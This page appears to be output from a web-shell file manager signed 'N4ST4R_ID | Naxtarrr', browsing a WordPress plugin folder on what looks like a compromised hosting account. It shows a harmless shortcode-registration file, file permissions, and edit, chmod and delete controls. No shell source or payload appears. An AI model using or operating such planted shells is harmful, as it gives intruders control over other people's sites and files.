Submit
Path:
~
/
home
/
getwphos
/
public_html
/
brueggemann
/
wp-content
/
plugins
/
wanderland-core
/
shortcodes
/
highlight
/
File Content:
functions.php
<?php if ( ! function_exists( 'wanderland_core_add_highlight_shortcodes' ) ) { function wanderland_core_add_highlight_shortcodes( $shortcodes_class_name ) { $shortcodes = array( 'WanderlandCore\CPT\Shortcodes\Highlight\Highlight' ); $shortcodes_class_name = array_merge( $shortcodes_class_name, $shortcodes ); return $shortcodes_class_name; } add_filter( 'wanderland_core_filter_add_vc_shortcode', 'wanderland_core_add_highlight_shortcodes' ); }
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
templates
---
0755
functions.php
468 bytes
0644
highlight.php
1141 bytes
0644
load.php
156 bytes
0644
N4ST4R_ID | Naxtarrr